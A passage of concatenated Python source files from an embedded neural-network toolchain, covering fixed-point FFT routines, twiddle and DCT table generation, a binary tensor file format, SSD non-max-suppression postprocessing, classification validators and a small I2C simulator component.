Br = np.int32(Data[0, iA+iM])
Bi = np.int32(Data[1, iA+iM])
Cr = np.int32(Data[0, iA+2*iM])
Ci = np.int32(Data[1, iA+2*iM])
Dr = np.int32(Data[0, iA+3*iM])
Di = np.int32(Data[1, iA+3*iM])
Data[0, iA ] = np.int16(Ar + Cr + Br + Dr)
Data[1, iA ] = np.int16(Ai + Ci + Bi + Di)
Data[0, iA+ iM] = np.int16(Ar - Cr + Bi - Di)
Data[1, iA+ iM] = np.int16(Ai - Ci - Br + Dr)
Data[0, iA+2*iM] = np.int16(Ar + Cr - Br - Dr)
Data[1, iA+2*iM] = np.int16(Ai + Ci - Bi - Di)
Data[0, iA+3*iM] = np.int16(Ar - Cr - Bi + Di)
Data[1, iA+3*iM] = np.int16(Ai - Ci + Br - Dr)
iA = iA + 4 * iM
return Data
def SwapSamples(In_Data, SwapTable):
Data = deepcopy(In_Data)
for i, swap_idx in enumerate(SwapTable):
if i < swap_idx:
Sr = Data[0, i]
Si = Data[1, i]
Data[0, i] = Data[0, swap_idx]
Data[1, i] = Data[1, swap_idx]
Data[0, swap_idx] = Sr
Data[1, swap_idx] = Si
return Data
def RFFT_Step_Fix16(In_Data, RTwiddles, N_fft):
RFFT_Out = np.zeros((2, N_fft//2+1))
xBR = np.int32(In_Data[0, 0]) >> 2
xBI = np.int32(In_Data[1, 0]) >> 2
xAR = np.int32(In_Data[0, 0]) >> 2
xAI = np.int32(In_Data[1, 0]) >> 2
RFFT_Out[0, 0] = (xBR + xAR + xBI + xAI)
RFFT_Out[1, 0] = (xAI - xBI + xBR - xAR)
k = N_fft // 2 - 1
for i in range(k):
twr, twi = np.int64(RTwiddles[0, 1+i]), np.int64(RTwiddles[1, 1+i])
xar, xai = np.int32(In_Data [0, 1+i]), np.int32(In_Data [1, 1+i])
xbr, xbi = np.int32(In_Data [0, k-i]), np.int32(In_Data [1, k-i])
t1r = np.int32((-xar + xbr) >> 2)
t1i = np.int32((-xai - xbi) >> 2)
t2r = np.int32(( xar + xbr) >> 2)
t2i = np.int32(( xai - xbi) >> 2)
RFFT_Out[0, i+1] = np.int16(((twr*t1r - twi*t1i) >> 15) + t2r)
RFFT_Out[1, i+1] = np.int16(((twr*t1i + twi*t1r) >> 15) + t2i)
xBR = np.int32(In_Data[0, k-(k-1)]) >> 2
xBI = np.int32(In_Data[1, k-(k-1)]) >> 2
xAR = np.int32(In_Data[0, 1+(k-1)]) >> 2
xAI = np.int32(In_Data[1, 1+(k-1)]) >> 2
RFFT_Out[0, k+1] = np.int16( xBR + xAR - xBI - xAI )
RFFT_Out[1, k+1] = np.int16(0) #( xAI - xBI - xBR + xAR )
return RFFT_Out
```
#### File: nntool/utils/gap_tensor_file.py
```python
import logging
import os
import struct
from io import BufferedWriter, BufferedReader
import numpy as np
LOG = logging.getLogger("nntool." + __name__)
TYPES = {
8: np.int8,
16: np.int16,
32: np.int32
}
CTYPES = {
np.int8: "signed char",
np.int16: "short int",
np.int32: "int"
}
class Header():
__FMT = '5i4i'
def __init__(self, step, tensor_type, size, elem_size, num_dims, *dims):
self.step = step
self.tensor_type = tensor_type
self.size = size
self.elem_size = elem_size
self.dims = [dims[i] for i in range(num_dims)]
@classmethod
def read(cls, fp: BufferedReader):
buf = fp.read(struct.calcsize(cls.__FMT))
if buf:
return cls(*struct.unpack(cls.__FMT, buf))
return None
def write(self, fp: BufferedWriter):
assert len(self.dims) <= 4, "up to 4 dimensions are supported"
dims = self.dims.copy() + [0] * (4 - len(self.dims))
buf = struct.pack(self.__FMT, self.step, self.tensor_type, self.size, self.elem_size, len(self.dims), *dims)
fp.write(buf)
def write_dims(prefix, fp, dims, elem_size):
assert len(dims) == 3
dim_names = ["CHANNELS", "HEIGHT", "WIDTH"]
for i, v in enumerate(dims):
fp.write('{}_{}?={}\n'.format(prefix, dim_names[i], v))
fp.write('{}_BITS?={}\n'.format(prefix, elem_size))
fp.write('{}_TYPE?={}\n'.format(prefix, CTYPES[TYPES[elem_size]]))
def write_make_include_file(filename, header, output_shape, output_elem_size):
with open(filename, 'w') as fp:
write_dims("INPUT", fp, header.dims, header.elem_size)
write_dims("OUTPUT", fp, output_shape, output_elem_size)
def get_bits(tensor):
bit_size = -1
for k, v in TYPES.items():
if tensor.dtype == v:
bit_size = k
break
if bit_size < 0:
raise ValueError("only int8, int16 and int32 are supported")
return bit_size
def write_gap_tensor(filename, tensor, step=0, output_tensor=None, make_file=None):
bit_size = get_bits(tensor)
with open(filename, 'wb') as fp:
header = Header(step, 0, tensor.size * bit_size // 8, bit_size, len(tensor.shape), *tensor.shape)
header.write(fp)
tensor.tofile(fp)
if output_tensor is not None and make_file is not None:
output_bit_size = get_bits(output_tensor)
write_make_include_file(make_file, header, output_tensor.shape, output_bit_size)
def read_gap_tensors(filename):
tensors = {}
size = os.path.getsize(filename)
max_step = -1
with open(filename, 'rb') as fp:
while fp.tell() < size:
header = Header.read(fp)
if not header:
break
if header.elem_size not in TYPES:
LOG.error("Bit width %s not found in types list. File may be corrupted.",
header.elem_size)
raise ValueError()
tensor = np.fromfile(fp, dtype=TYPES[header.elem_size], count=header.size)
step_rec = tensors.get(header.step)
if not step_rec:
step_rec = [None]*3
tensors[header.step] = step_rec
elem = 0 if header.tensor_type < 2 else header.tensor_type - 1
step_rec[elem] = tensor.reshape(header.dims)
if header.step > max_step:
max_step = header.step
return [tensors.get(i) for i in range(max_step + 1)]
```
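A minimal round trip through the tensor file format above, assuming the module is importable as `utils.gap_tensor_file` (path taken from the file header); an int8 tensor is used so the byte size written in the header matches the element count read back:
```python
import numpy as np
from utils.gap_tensor_file import write_gap_tensor, read_gap_tensors

t = np.arange(24, dtype=np.int8).reshape(2, 3, 4)
write_gap_tensor('step0_output.tensor', t, step=0)
tensors = read_gap_tensors('step0_output.tensor')  # list indexed by step number
print(tensors[0][0].shape, tensors[0][0].dtype)    # -> (2, 3, 4) int8
```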
#### File: nntool/utils/gen_twiddles.py
```python
import numpy as np
def gen_fft_twiddles_lut(Nfft, Inverse=False, rad4=False):
Phi = (np.pi * 2 / Nfft) * np.arange(0, Nfft)
if Inverse:
Twiddles_real = np.cos(Phi)
Twiddles_imag = np.sin(Phi)
else:
Twiddles_real = np.cos(-Phi)
Twiddles_imag = np.sin(-Phi)
if rad4:
twid = np.empty((2 * int(3*Nfft/4), ), dtype=Twiddles_real.dtype)
twid[0::2] = Twiddles_real[:int(3*Nfft/4)]
twid[1::2] = Twiddles_imag[:int(3*Nfft/4)]
return twid
twid = np.empty((2 * int(Nfft//2), ), dtype=Twiddles_real.dtype)
twid[0::2] = Twiddles_real[:int(Nfft//2)]
twid[1::2] = Twiddles_imag[:int(Nfft//2)]
return twid
def gen_rfft_twiddles_lut(Nfft):
Phi = (np.pi * 2 / Nfft) * np.arange(0, Nfft//2)
Twiddles_real = np.sin(Phi)
Twiddles_imag = np.cos(Phi)
twid = np.empty((Twiddles_real.size + Twiddles_imag.size, ), dtype=Twiddles_real.dtype)
twid[0::2] = Twiddles_real
twid[1::2] = Twiddles_imag
return twid
def gen_fft_swaptable_lut(Ni, rad4=False):
if rad4:
log4 = int(np.log2(Ni) / 2)
iL = Ni / 4
iM = 1
SwapTable = np.zeros(Ni)
for i in range(log4):
for j in range(iM):
SwapTable[j + iM] = SwapTable[j] + iL
SwapTable[j + 2*iM] = SwapTable[j] + 2*iL
SwapTable[j + 3*iM] = SwapTable[j] + 3*iL
iL /= 4
iM *= 4
else:
log2 = int(np.log2(Ni))
iL = Ni / 2
iM = 1
SwapTable = np.zeros(Ni)
for i in range(log2):
for j in range(iM):
SwapTable[j + iM] = SwapTable[j] + iL
iL /= 2
iM *= 2
return SwapTable
def gen_dct_twiddles_lut(Ndct, dct_type=2, norm=None):
norm_factor = np.ones((Ndct, Ndct))
if norm == "ortho" and dct_type == 2:
norm_factor *= np.sqrt(1/(2*Ndct))
norm_factor[0] = np.sqrt(1/(4*Ndct))
if norm == "ortho" and dct_type == 3:
norm_factor *= np.sqrt(1/(2*Ndct))
norm_factor[0] = np.sqrt(1/(Ndct))
DCT_Coeff = np.zeros((Ndct, Ndct))
for k in range(Ndct):
for i in range(Ndct):
if dct_type == 2:
coeff = 2*np.cos(np.pi / (2*Ndct) * k * (2*i + 1))
elif dct_type == 3:
coeff = 1 if i == 0 else 2*np.cos(np.pi / (2*Ndct) * i * (2*k + 1))
else:
raise NotImplementedError("DCT type 2 and 3 only supported")
DCT_Coeff[k, i] = coeff
return (DCT_Coeff * norm_factor)
```
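For example, the radix-2 twiddles for an 8-point FFT come back as an interleaved real/imag vector; quantizing them to Q15 and de-interleaving gives the 2 x N/2 `Twiddles` layout (row 0 real, row 1 imaginary) indexed by the fixed-point FFTs in `fft_quant.py` above. Import path assumed from the file header:
```python
import numpy as np
from utils.gen_twiddles import gen_fft_twiddles_lut

twid = gen_fft_twiddles_lut(8)                           # interleaved re/im, length 2 * (8 // 2)
twid_q15 = np.clip(np.round(twid * (1 << 15)), -32768, 32767).astype(np.int16)
twiddles = np.stack([twid_q15[0::2], twid_q15[1::2]])    # shape (2, 4): row 0 real, row 1 imag
print(twiddles)
```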
#### File: nntool/utils/ssd_postprocess_nms.py
```python
import copy
import json
import os
from typing import NamedTuple
import numpy as np
class ValException(Exception):
pass
class Detection(NamedTuple):
bboxes: np.array
scores: np.array
classes: np.array
class NonMaxSuppression(object):
'''
Parameters that should be initialized:
- max_detections_per_class
- max_classes_per_detection
- max_total_detections
- iou_threshold
- score_threshold
- regular_nms
'''
def __init__(self, nms_configuration, use_regular_nms=True):
# pylint: disable=no-member,bare-except
'''
# default values of parameters required for nms:
max_classes_per_detection: Maximum number of classes to output per detection box.
detections_per_class: Number of anchors used per class in Regular Non-Max-Suppression.
        use_regular_nms: Flag to set postprocessing op to use Regular NMS instead of Fast NMS.
'''
self._max_detections_per_class = 10
self._max_classes_per_detection = 1
self._max_total_detections = 100
self._iou_threshold = 0.3
self._score_threshold = 0.5
self._num_classes = None
self.nms_configuration = nms_configuration
# selection nms method: fast or regular?
if use_regular_nms:
self.nms_core = self._regular_nms
else:
self.nms_core = self._fast_nms
# all allowed keys will be initialized as class attributes
allowed_keys = set(
['using_json_config', 'using_pipeline_config', 'using_params'])
# initialize all allowed keys to false
self.__dict__.update((key, None) for key in allowed_keys)
# and update the given keys by their given values
self.__dict__.update(
(key, value) for key, value in nms_configuration.items() if key in allowed_keys)
'loading params values'
if self.using_json_config['INCLUDE']:
json_config_path = self.using_json_config['json_config_path']
if not os.path.isfile(json_config_path):
raise ValException(
'\n\n the path to the json file is not valid.')
with open(json_config_path) as json_file:
json_data = json.load(json_file)
try:
self.max_detections_per_class = json_data['detections_per_class']
except:
self.max_detections_per_class = self._max_detections_per_class
                print('Warning: default assignment for max_detections_per_class: {value}.'
.format(value=self._max_detections_per_class))
try:
self.max_classes_per_detection = json_data['max_classes_per_detection']
except:
self.max_classes_per_detection = self._max_classes_per_detection
                print('Warning: default assignment for max_classes_per_detection: {value}.'
.format(value=self._max_classes_per_detection))
try:
self.max_total_detections = json_data['max_detections']
except:
self.max_total_detections = self._max_total_detections
                print('Warning: default assignment for max_total_detections: {value}.'
.format(value=self._max_total_detections))
try:
self.iou_threshold = json_data['nms_iou_threshold']
except:
self.iou_threshold = self._iou_threshold
                print('Warning: default assignment for iou_threshold: {value}.'
.format(value=self._iou_threshold))
try:
self.score_threshold = json_data['nms_score_threshold']
except:
self.score_threshold = self._score_threshold
                print('Warning: default assignment for score_threshold: {value}.'
.format(value=self._score_threshold))
try:
self.num_classes = json_data['num_classes']
except:
                self.num_classes = self._num_classes
                print('Warning: default assignment for num_classes: {value}.'
                    .format(value=self._num_classes))
self._output_quantized = json_data['_output_quantized']
self._support_output_type_float_in_quantized_op = json_data[
'_support_output_type_float_in_quantized_op']
elif self.using_pipeline_config['INCLUDE']:
raise ValException('Need to import object_detection from tf')
elif self.using_params['INCLUDE']:
params = self.using_params['params']
# max_detection_per_class is left default
self.max_detections_per_class = self._max_detections_per_class
if isinstance(params['max_classes_per_detection'], int) and params['max_classes_per_detection'] > 0:
self.max_classes_per_detection = params['max_classes_per_detection']
else:
                raise ValException('\n\n no valid max_classes_per_detection is assigned, should be a positive integer ...')
if isinstance(params['max_detections'], int) and params['max_detections'] > 0:
self.max_total_detections = params['max_detections']
else:
                raise ValException('\n\n no valid max_total_detections is assigned, should be a positive integer ...')
if isinstance(params['nms_iou_threshold'], float) and params['nms_iou_threshold'] > 0 and \
params['nms_iou_threshold'] < 1.:
self.iou_threshold = params['nms_iou_threshold']
else:
                raise ValException('\n\n no valid iou_threshold is assigned, should be a float in the range (0., 1.).')
if isinstance(params['nms_score_threshold'], float) and params['nms_score_threshold'] > 0 and \
params['nms_score_threshold'] < 1.:
self.score_threshold = params['nms_score_threshold']
else:
                raise ValException('\n\n no valid score_threshold is assigned, should be a float in the range (0., 1.).')
if isinstance(params['num_classes'], int) and params['num_classes'] > 0:
self.num_classes = params['num_classes']
else:
                raise ValException('\n\n no valid num_classes is assigned, should be a positive integer ...')
else:
raise ValException(
'\n\n no method is chosen to assigne non-max-suppression ...')
def calculate_iou(self, base_bbox, rest_bboxes):
'calculate iou between a base bounding box and an array of bboxes'
ymin, xmin, ymax, xmax = 0, 1, 2, 3
# base anchor
base_bbox_cor = copy.deepcopy(base_bbox)
base_bbox_area = (base_bbox_cor[ymax] - base_bbox_cor[ymin]).astype(np.int32) *\
(base_bbox_cor[xmax] - base_bbox_cor[xmin]).astype(np.int32)
# an array of anchors
rest_bboxes_cor = copy.deepcopy(rest_bboxes)
# rest anchors area
rest_bboxes_area = (rest_bboxes_cor[:, ymax] - rest_bboxes_cor[:, ymin]) *\
(rest_bboxes_cor[:, xmax] - rest_bboxes_cor[:, xmin])
# inter section coordinates
inter_ymin = np.maximum(rest_bboxes_cor[:, ymin], base_bbox_cor[ymin])
inter_xmin = np.maximum(rest_bboxes_cor[:, xmin], base_bbox_cor[xmin])
inter_ymax = np.minimum(rest_bboxes_cor[:, ymax], base_bbox_cor[ymax])
inter_xmax = np.minimum(rest_bboxes_cor[:, xmax], base_bbox_cor[xmax])
# TODO: do we need to keep pixel border horizons???
# inter section width and height
inter_w = np.maximum(inter_xmax - inter_xmin, 0)
inter_h = np.maximum(inter_ymax - inter_ymin, 0)
inter_area = inter_w * inter_h
iou = inter_area / (rest_bboxes_area + base_bbox_area - inter_area)
return iou
def greedy_non_maximum_suppression(self, bboxes, confidences):
'''
This function performs greedy non maximum suppression algorithm on a dataframe of anchors.
step 1) keep anchors with a confidence more than the assigned confidence threshold.
step 2) sort derived anchors from step 1 according to their confidences.
step 3) apply greedy nms over the sorted anchors by evaluation of ious.
step 4) return a dataframe including the anchors, their confidences and class_id
'''
        # default anchor indices before applying any sort
bboxes_indices = np.arange(bboxes.shape[0])
# apply confidence threshold
valid_confs_indices = bboxes_indices[confidences >=
self.score_threshold]
valid_confs = confidences[valid_confs_indices]
        # sort the confidences greater than the confidence threshold
args = np.argsort(valid_confs)[::-1] # sort the confidences and
inds = valid_confs_indices[args] # back to the original indices
# greedy search
kept_indices = []
while inds.size:
base_ind = inds[0]
# print('base_ind_confidence: ', confidences[base_ind])
rest_inds = inds[1:]
# lets store the base anchor in the bank
kept_indices.append(base_ind)
base_bbox = copy.deepcopy(bboxes[base_ind, :])
rest_bboxes = copy.deepcopy(bboxes[rest_inds, :])
iou = self.calculate_iou(base_bbox, rest_bboxes)
# print('before: rest_inds', rest_inds.shape)
            # let's keep bboxes having iou less than iou_threshold for the next iteration's evaluation
inds = rest_inds[iou < self.iou_threshold]
# print('after: rest_inds', rest_inds.shape)
# return the valid anchors
valid_bboxes = bboxes[kept_indices, :]
valid_bboxes_confidence = confidences[kept_indices]
        # to know how many classes are predicted within each anchor: max_classes_per_detection
valid_anchors_inds = kept_indices
return valid_bboxes, valid_bboxes_confidence, np.array(valid_anchors_inds)
def _regular_nms(self, bboxes, confidences):
# num classes
num_classes = confidences.shape[1]
# predictions
predicted_bboxes = [] # bboxes coordinates
predicted_confidences = [] # bboxes confidences
predicted_class_ids = [] # to which class the bbox belongs to?
predicted_anchors_indides = [] # the bbox indices in the reference anchor array
# loop over classes apart from the background
for class_id in range(1, num_classes):
            # a one-dimensional array containing the confidences for this class_id
class_confidences = confidences[:, class_id]
# a copy of transformed anchor boxes
class_bboxes = copy.deepcopy(bboxes)
            # greedy nms over the anchors; returns the kept bboxes, their confidences and the anchor indices
valid_class_bboxes, valid_class_confidences, valid_anchors_indices = self.greedy_non_maximum_suppression(
class_bboxes, class_confidences)
# if there are detections
if len(valid_class_bboxes) > 0:
num_detections = valid_class_bboxes.shape[0]
'apply <max_detections_per_class>'
to_keep = min(num_detections, self.max_detections_per_class)
# add decoded anchors to the bank
predicted_bboxes.append(valid_class_bboxes[:to_keep, :])
predicted_confidences.append(valid_class_confidences[:to_keep])
valid_class_ids = np.zeros_like(
valid_class_confidences[:to_keep])+class_id
predicted_class_ids.append(valid_class_ids)
predicted_anchors_indides.append(
valid_anchors_indices[:to_keep])
'now concatenate predictions for all classes.'
predicted_bboxes = np.concatenate(predicted_bboxes)
predicted_confidences = np.concatenate(predicted_confidences)
predicted_class_ids = np.concatenate(predicted_class_ids)
predicted_anchors_indides = np.concatenate(predicted_anchors_indides)
'apply <max_classes_per_detection>'
# sort: descending order
sorted_confidences_args = np.argsort(-predicted_confidences, axis=0)
sorted_detections_bboxes = predicted_bboxes[sorted_confidences_args, :]
sorted_detections_confidences = predicted_confidences[sorted_confidences_args]
sorted_detections_class_ids = predicted_class_ids[sorted_confidences_args]
sorted_detections_anchors_indides = predicted_anchors_indides[sorted_confidences_args]
're-write detections accordingly'
predicted_bboxes = []
predicted_confidences = []
predicted_class_ids = []
predicted_anchors_indides = []
anchorS_indices = np.unique(sorted_detections_anchors_indides)
# loop over anchors
for i, ind in enumerate(anchorS_indices):
anchor_indices = sorted_detections_anchors_indides == ind
temp_detected_bboxes = sorted_detections_bboxes[anchor_indices, :]
temp_detected_confidences = sorted_detections_confidences[anchor_indices]
temp_detected_class_ids = sorted_detections_class_ids[anchor_indices]
# all values must be equal to the <ind>
temp_detected_anchors_indides = sorted_detections_anchors_indides[anchor_indices]
# apply max_classes_per_detection:
limited_number = min(
len(temp_detected_anchors_indides), self.max_classes_per_detection)
predicted_bboxes.append(temp_detected_bboxes[:limited_number, :])
predicted_confidences.append(
temp_detected_confidences[:limited_number])
predicted_class_ids.append(
temp_detected_class_ids[:limited_number])
predicted_anchors_indides.append(
temp_detected_anchors_indides[:limited_number])
'now concatenate predictions for all anchors.'
predicted_bboxes = np.concatenate(predicted_bboxes)
predicted_confidences = np.concatenate(predicted_confidences)
predicted_class_ids = np.concatenate(predicted_class_ids)
predicted_anchors_indides = np.concatenate(predicted_anchors_indides)
'apply <max_total_detections>'
max_confidences_args = np.argsort(predicted_confidences, axis=0)
total_detections_confidences = predicted_confidences[
max_confidences_args[-self.max_total_detections:]]
total_detections_bboxes = predicted_bboxes[max_confidences_args[-self.max_total_detections:], :]
total_detections_class_ids = predicted_class_ids[
max_confidences_args[-self.max_total_detections:]]
#total_detections_anchors_indides = predicted_anchors_indides[max_confidences_args[-self.max_total_detections:]]
# return total_detections_bboxes, total_detections_confidences, total_detections_class_ids, total_detections_anchors_indides
return total_detections_bboxes, total_detections_confidences, total_detections_class_ids
def fast_greedy_non_maximum_suppression(self, bboxes, confidences, labels_score, labels, anchors_indices):
'''
applying greedy_non_maximum_suppression in a fast way!!!
'''
        # default anchor indices before applying any sort
bboxes_indices = np.arange(bboxes.shape[0])
        # sort the confidences greater than the confidence threshold
args = np.argsort(labels_score)[::-1] # sort the confidences and
inds = bboxes_indices[args] # back to the original indices
# greedy search
kept_indices = []
while inds.size:
base_ind = inds[0]
rest_inds = inds[1:]
# lets store the base anchor in the bank
kept_indices.append(base_ind)
base_bbox = copy.deepcopy(bboxes[base_ind, :])
rest_bboxes = copy.deepcopy(bboxes[rest_inds, :])
iou = self.calculate_iou(base_bbox, rest_bboxes)
            # let's keep bboxes having iou less than iou_threshold for the next iteration's evaluation
inds = rest_inds[iou < self.iou_threshold]
# return the valid anchors
valid_bboxes = bboxes[kept_indices, :]
valid_confidences = confidences[kept_indices, :]
valid_labels_score = labels_score[kept_indices]
valid_labels_labels = labels[kept_indices]
valid_anchors_indices = anchors_indices[kept_indices]
return valid_bboxes, valid_confidences, valid_labels_score, valid_labels_labels, valid_anchors_indices
def _fast_nms(self, bboxes, confidences):
# num classes
num_classes = confidences.shape[1]
anchors_indices = np.arange(bboxes.shape[0])
# predictions
predicted_bboxes = [] # bboxes coordinates
predicted_labels = [] # bboxes confidences
predicted_labels_score = [] # to which class the bbox belongs to?
predicted_anchor_indices = [] # anchor indices, for debugging
# convert one-hot labels into ordinal labels with their confidences
labels = np.argmax(confidences, axis=1) # the ordinal labels
labels_score = np.amax(confidences, axis=1) # the scores of labels
# non-background labels
non_background_indices = labels != 0
# non-background (nb) bboxes
nb_bboxes = bboxes[non_background_indices, :] # bboxes
nb_confidences = confidences[non_background_indices] # one-hot scores
# labels with highest confidences
nb_labels = labels[non_background_indices]
# the highest confidences
nb_labels_score = labels_score[non_background_indices]
# anchors indices
nb_anchors_indices = anchors_indices[non_background_indices]
# non-background (nb) bboxes that have scores/confidences higher than score_threshold
valid_nb_bboxes_inidces = nb_labels_score >= self.score_threshold
# bboxes
valid_nb_bboxes = nb_bboxes[valid_nb_bboxes_inidces, :]
# one-hot scores
valid_nb_confidences = nb_confidences[valid_nb_bboxes_inidces]
# labels with highest confidences
valid_nb_labels = nb_labels[valid_nb_bboxes_inidces]
# the highest confidences
valid_nb_labels_score = nb_labels_score[valid_nb_bboxes_inidces]
valid_nb_anchors_indices = nb_anchors_indices[valid_nb_bboxes_inidces]
        # for a given iou threshold, evaluate iou between the bboxes
        if self.iou_threshold is not None:
valid_nb_bboxes, valid_nb_confidences, valid_nb_labels_score, valid_nb_labels, valid_nb_anchor_indices =\
self.fast_greedy_non_maximum_suppression(
valid_nb_bboxes, valid_nb_confidences, valid_nb_labels_score, valid_nb_labels, valid_nb_anchors_indices)
'apply <max_detections_per_class>'
for class_id in range(1, num_classes):
# select class information
class_indices = valid_nb_labels == class_id
            if np.sum(class_indices) > 0:  # be sure that at least one bbox exists
temp_bboxes = valid_nb_bboxes[class_indices, :]
temp_labels = valid_nb_labels[class_indices]
temp_labels_score = valid_nb_labels_score[class_indices]
temp_anchor_indices = valid_nb_anchor_indices[class_indices]
# sort according to the scores
max_args = np.argsort(-temp_labels_score, axis=0)
temp_bboxes = temp_bboxes[max_args, :]
temp_labels = temp_labels[max_args]
temp_labels_score = temp_labels_score[max_args]
temp_anchor_indices = temp_anchor_indices[max_args]
to_keep = min(len(temp_labels), self.max_detections_per_class)
predicted_bboxes.append(temp_bboxes[:to_keep, :])
predicted_labels.append(temp_labels[:to_keep])
predicted_labels_score.append(temp_labels_score[:to_keep])
predicted_anchor_indices.append(temp_anchor_indices[:to_keep])
'now concatenate predictions for all classes.'
predicted_bboxes = np.concatenate(predicted_bboxes)
predicted_labels = np.concatenate(predicted_labels)
predicted_labels_score = np.concatenate(predicted_labels_score)
predicted_anchor_indices = np.concatenate(predicted_anchor_indices)
'apply <max_total_detections>'
to_keep = min(len(predicted_labels), self.max_total_detections)
max_args = np.argsort(-predicted_labels_score, axis=0)
predicted_bboxes = predicted_bboxes[max_args[:to_keep], :]
predicted_labels = predicted_labels[max_args[:to_keep]]
predicted_labels_score = predicted_labels_score[max_args[:to_keep]]
predicted_anchor_indices = predicted_anchor_indices[max_args[:to_keep]]
return predicted_bboxes, predicted_labels_score, predicted_labels
def __call__(self, decoded_bboxes, scores):
'''
use nms core to decode predictions
decoded_bboxes: [batch_size, number_anchors, 4]
scores: [batch_size, number_anchors, number of classes]
'''
# add batch dimension, if not included
if decoded_bboxes.ndim == 2:
decoded_bboxes = decoded_bboxes.reshape([1, -1, decoded_bboxes.shape[1]])
if scores.ndim == 2:
scores = scores.reshape([1, -1, scores.shape[1]])
# for all batch items
detections = [[]] * decoded_bboxes.shape[0]
for i in range(len(detections)):
            # use per-item results; don't clobber the batched scores array used by later iterations
            det_bboxes, det_scores, det_classes = self.nms_core(decoded_bboxes[i, :, :], scores[i, :, :])
            detections[i] = Detection(det_bboxes, det_scores, det_classes)
return detections
```
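The heart of `greedy_non_maximum_suppression` above is the score-threshold / sort / IoU-suppress loop described in its docstring. A self-contained miniature version of that loop (boxes as `[ymin, xmin, ymax, xmax]`, plain numpy, no class setup needed):
```python
import numpy as np

def iou(base, rest):
    # IoU between one box and an array of boxes
    area_b = (base[2] - base[0]) * (base[3] - base[1])
    area_r = (rest[:, 2] - rest[:, 0]) * (rest[:, 3] - rest[:, 1])
    iymin = np.maximum(rest[:, 0], base[0])
    ixmin = np.maximum(rest[:, 1], base[1])
    iymax = np.minimum(rest[:, 2], base[2])
    ixmax = np.minimum(rest[:, 3], base[3])
    inter = np.maximum(iymax - iymin, 0) * np.maximum(ixmax - ixmin, 0)
    return inter / (area_b + area_r - inter)

def greedy_nms(boxes, scores, score_thr=0.5, iou_thr=0.3):
    # step 1: drop low-confidence boxes, step 2: sort by confidence,
    # step 3: repeatedly keep the best box and suppress boxes that overlap it too much
    inds = np.arange(len(scores))[scores >= score_thr]
    inds = inds[np.argsort(scores[inds])[::-1]]
    kept = []
    while inds.size:
        base, rest = inds[0], inds[1:]
        kept.append(int(base))
        inds = rest[iou(boxes[base], boxes[rest]) < iou_thr]
    return kept

boxes = np.array([[0, 0, 10, 10], [1, 1, 10, 10], [20, 20, 30, 30]], dtype=float)
scores = np.array([0.9, 0.8, 0.7])
print(greedy_nms(boxes, scores))  # -> [0, 2]: box 1 overlaps box 0 and is suppressed
```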
#### File: nntool/utils/validation_utils.py
```python
import json
import os
from abc import ABC, abstractmethod
import numpy as np
SUPPORTED_PREDICTION = {'classification'} #add 'object-detection'
class ValidateBase(ABC):
def __init__(self, class_thr=0, binary_classification=False, type_of_prediction='classification'):
if type_of_prediction not in SUPPORTED_PREDICTION:
            raise NotImplementedError("type_of_prediction must be in %r, %s not supported" % (SUPPORTED_PREDICTION, type_of_prediction))
self.class_thr = class_thr
self.binary_classification = binary_classification
self.labels = []
self.predictions = []
@abstractmethod
def validate(self, input_name, predicted):
pass
class ValidateFromClass(ValidateBase):
def __init__(self, class_number, type_of_prediction='classification', **kargs):
super().__init__(type_of_prediction=type_of_prediction, **kargs)
self._class_number = class_number
    # the label is the same for every sample (the given class_number)
def validate(self, input_name, predicted):
predicted = predicted.flatten()
if self.binary_classification:
class_predicted = int(predicted > self.class_thr)
margin = abs(predicted - self.class_thr)
else:
class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0
margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted]))
self.predictions.append(class_predicted)
self.labels.append(self._class_number)
return class_predicted == self._class_number, class_predicted, self._class_number, margin
class ValidateFromName(ValidateBase):
    # the label is encoded in the last digits of the filename
def validate(self, input_name, predicted):
num_classes = predicted.size
filename, _ = os.path.splitext(input_name)
num_classes_digits = len(str(num_classes-1))
label = int(filename[-(num_classes_digits):])
predicted = predicted.flatten()
if self.binary_classification:
class_predicted = int(predicted > self.class_thr)
margin = abs(predicted - self.class_thr)
else:
class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0
margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted]))
self.predictions.append(class_predicted)
self.labels.append(label)
return class_predicted == label, class_predicted, label, margin
class ValidateFromJSON(ValidateBase):
def __init__(self, json_file, **kargs):
super().__init__(**kargs)
with open(json_file) as file:
self.annotations = json.load(file)
def validate(self, input_name, predicted):
#num_classes = predicted.size
_, file = os.path.split(input_name)
label = self.annotations[file]
predicted = predicted.flatten()
if self.binary_classification:
class_predicted = int(predicted > self.class_thr)
margin = abs(predicted - self.class_thr)
else:
class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0
margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted]))
self.predictions.append(class_predicted)
self.labels.append(label)
return class_predicted == label, class_predicted, label, margin
class ValidateFromVWWInstances(ValidateBase):
def __init__(self, instances_file, **kargs):
super().__init__(**kargs)
with open(instances_file) as file:
self.instances = json.load(file)
def validate(self, input_name, predicted):
_, file_name = os.path.split(input_name)
for image in self.instances['images']:
if image['file_name'] == file_name:
idx = image['id']
label = self.instances['annotations'][str(idx)]['label']
break
predicted = predicted.flatten()
if self.binary_classification:
class_predicted = int(predicted > self.class_thr)
margin = abs(predicted - self.class_thr)
else:
class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0
margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted]))
self.predictions.append(class_predicted)
self.labels.append(label)
return class_predicted == label, class_predicted, label, margin
```
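A minimal usage sketch for `ValidateFromName` above, run with the classes in scope; the file name `img_07.png` and the logits are made up, and the ground-truth label is simply the last digit(s) of the file name:
```python
# Hypothetical example: the label is encoded in the file name's last digits.
import numpy as np

validator = ValidateFromName(class_thr=0, binary_classification=False)
logits = np.array([0.1, 0.05, 0.2, 0.01, 0.3, 0.02, 0.05, 0.9, 0.1, 0.05])  # 10 classes
ok, predicted, label, margin = validator.validate("img_07.png", logits)
print(ok, predicted, label, round(float(margin), 3))  # True 7 7 ...
```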
#### File: devices/i2c/corruptor.py
```python
import gsystree as st
from ips.clock.clock_domain import Clock_domain
class Corruptor(st.Component):
def __init__(self, parent, name, address=80):
super(Corruptor, self).__init__(parent, name)
corruptor = Corruptor.Corruptor_implem(self, 'corruptor', address=address)
clock = Clock_domain(self, 'clock', frequency=10000000)
self.bind(clock, 'out', corruptor, 'clock')
